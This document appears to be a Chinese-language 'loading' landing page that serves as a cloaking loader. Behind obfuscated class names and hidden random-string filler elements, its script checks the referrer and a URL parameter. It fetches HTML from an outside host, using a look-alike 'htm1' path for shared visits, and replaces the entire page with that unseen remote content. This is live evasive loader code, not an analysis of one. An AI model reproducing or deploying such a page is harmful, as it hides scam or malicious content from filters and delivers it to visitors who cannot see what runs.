<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .OiasNQQOgkV {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .OiasNQQOgkV .DU6npfpej {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .OiasNQQOgkV .content {
            line-height: 50px;
            text-align: center
        }

        .OiasNQQOgkV .img {
            width: 100%
        }

        .OiasNQQOgkV .K8wHk5qqUDd {
            text-align: center
        }

        .OiasNQQOgkV .K8wHk5qqUDd span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .OiasNQQOgkV .K8wHk5qqUDd span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .OiasNQQOgkV .K8wHk5qqUDd span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .OiasNQQOgkV .K8wHk5qqUDd span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .OiasNQQOgkV .K8wHk5qqUDd span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .OiasNQQOgkV .K8wHk5qqUDd span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .OiasNQQOgkV .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function lzhojMFc5GzkS(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var pS40vIt = lzhojMFc5GzkS('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ pS40vIt +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ pS40vIt +".html?a=share";
		}
		
        e5qZtSPCl=url+"#"+new Date().getTime();
        e5qZtSPCl && function() {
            $.get(e5qZtSPCl, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>CYVotSmNbaK693vXDuFUHoUZ4XkA</div>
<p  style='display:none'>gOPFjUX2iw7cEDCen9kA7XTX</p>
<ul style='display:none' >ZlbOEJKLbkxw7lm1gogDy1cTsHkQnSulpfFMtUXxCk8j8pF43vdyVueULLb0UwwSa</ul>
<h1 style='display:none' >YZCOfId225VCLuzZkjjR8</h1>
<div style='display:none'>CYVotSmNbaK693vXDuFUHoUZ4XkA</div>
<img  src='' style='display:none'><div class="OiasNQQOgkV">
    <div class="DU6npfpej">
        <div class="K8wHk5qqUDd">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>VlOmabvgEUii0kfCHSRhJIudMkdVVixIMSIBtyDRTAXF2YOdqRtXq3bjTJckaia4WWpxMMO2yprhKCnztpHkL4mNhWUaA</a>
<ul style='display:none' >TyiXuYrbCxBfUikwkE9MdrY6hCbYcQ14</ul>
<li style='display:none' >wXFAgi3HIDyhG5XDq1Zgk5</li>
<span style='display:none'>NfoEls8dkPTpicCUx3yEmNhJNDJwZyTjc6cvdJzc3XZ3Rh9XFZ</span></body>
</html>